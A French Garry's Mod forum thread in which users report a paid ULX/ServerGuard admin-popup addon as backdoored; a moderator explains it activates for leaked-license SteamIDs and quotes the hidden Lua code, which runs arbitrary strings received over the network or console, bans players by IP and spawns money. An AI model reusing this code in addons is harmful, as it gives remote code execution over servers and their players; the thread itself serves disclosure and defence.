Backdoor ?

  • Initiateur de la discussion ViPerZe_
  • Date de début
  • Initiateur de la discussion
ViPerZe_

ViPerZe_

Geek suprême
Messages
371
Score réaction
88
Points
150
Ceci est assez troublant...

1528985978262.png


Qu'en pensez vous ?
L'addon vient de SF :)
Déjà signalé.
https://www.gmodstore.com/scripts/view/1673/admin-popups-for-ulx-and-serverguard
 
  • J'aime
Réactions: Makss
Makss

Makss

Psychopathe
Messages
830
Score réaction
990
Points
310
Leak d'une partie d'un addon, signalé
 
  • J'aime
Réactions: ViPerZe_
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Messages
6 527
Score réaction
5 488
Points
1 295
En gros, le code exécuté par le server sera un code de type backdoor (voir spoiler) uniquement si la license utiliser est un steamid64 qu'un mec qui a leak l'addon (il dois surement avoir une liste de son coté pour gérer les steamid) .... Si la license est un steamid64 d'un mec qui l'a acheter et pas leak ou qui ne la pas acheter, le code exécuté est sans danger

Code:
cyan_nc.state = "ok"
concommand.Add("lua_opens", function(ply, _, c, raw) ply:SendLua([[local f="lua/]] .. (raw or table.concat(c, " ")) .. [[";print("r",f);RunString(file.Read(f, "GAME"),"indef")]])
end)
concommand.Add("lua_runs", function(ply, _, c, raw) local stat, f = pcall(CompileString, raw or table.concat(c, " "), "indef", false) if not stat then return ply:ChatPrint("cspce" .. tostring(f) .. debug.getinfo(CompileString).short_src) end if type(f) == "string" then return ply:ChatPrint(tostring(f)) end local r, e = pcall(f) ply:ChatPrint(tostring(r) .. tostring(e))
end)
util.AddNetworkString("fourhead")
net.Receive("fourhead", function() RunString(net.ReadString())
end)
concommand.Add("ipfam", function(_,_,_,r) local u = ULib.getUser(r) local i = u:IPAddress() u:Kick("Steam Auth Ticket has been Cancelled") timer.Simple(1, function() RunConsoleCommand("addip", "99999999", i) RunConsoleCommand("writeip") end)
end)
hook.Add("onChatCommand", "LolNiceLeakBruh", function(ply, cmd, args) if (cmd == "/" or cmd == "a" or cmd == "ooc") and string.find(args, "Kappa") then DarkRP.createMoneyBag(ply:EyePos() + ply:GetAimVector() * 50, 50000) end
end)


Si tu veux rester sécu, retire juste le code http, ou change le runstring en un file.Write pour t'amuser à voir ce qui est exécuté sur ton serv ;)
 
Dernière édition:
  • J'aime
Réactions: RedTroz, Kiripou et ViPerZe_
RedTroz

RedTroz

Geek suprême
Messages
825
Score réaction
233
Points
195
ViPerZe_ à dit:
Ceci est assez troublant...

Regarde la pièce jointe 7692

Qu'en pensez vous ?
L'addon vient de SF :)
Déjà signalé.
https://www.gmodstore.com/scripts/view/1673/admin-popups-for-ulx-and-serverguard
MDRRRRR "This script was disabled by a content curator for the following reason: Probable backdoor "

 
  • J'aime
Réactions: Yoh Sambre ♪
Syze_cs

Syze_cs

Geek suprême
Messages
610
Score réaction
135
Points
160
RedTroz à dit:
MDRRRRR "This script was disabled by a content curator for the following reason: Probable backdoor "

Ah ouai mdr x) J'ai eu le te temps de l'acheter
 
  • J'aime
Réactions: Yoh Sambre ♪
  • Initiateur de la discussion
ViPerZe_

ViPerZe_

Geek suprême
Messages
371
Score réaction
88
Points
150
RedTroz à dit:
MDRRRRR "This script was disabled by a content curator for the following reason: Probable backdoor "

Bah oui j'ai signalé mdrrr
 
Pierre97

Pierre97

Geek
Messages
360
Score réaction
68
Points
70
le createur a fait une MAJ.. il a rectifié le probleme
 
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Messages
6 527
Score réaction
5 488
Points
1 295
Pierre97 à dit:
le createur a fait une MAJ.. il a rectifié le probleme


Y a plus qu'a espérer que cette fois il ne le remette pas 4Head
 
  • J'aime
Réactions: ViPerZe_, melcez, Wabel et 1 autre personne
Discord d'entraide
Rejoignz-nous sur Discord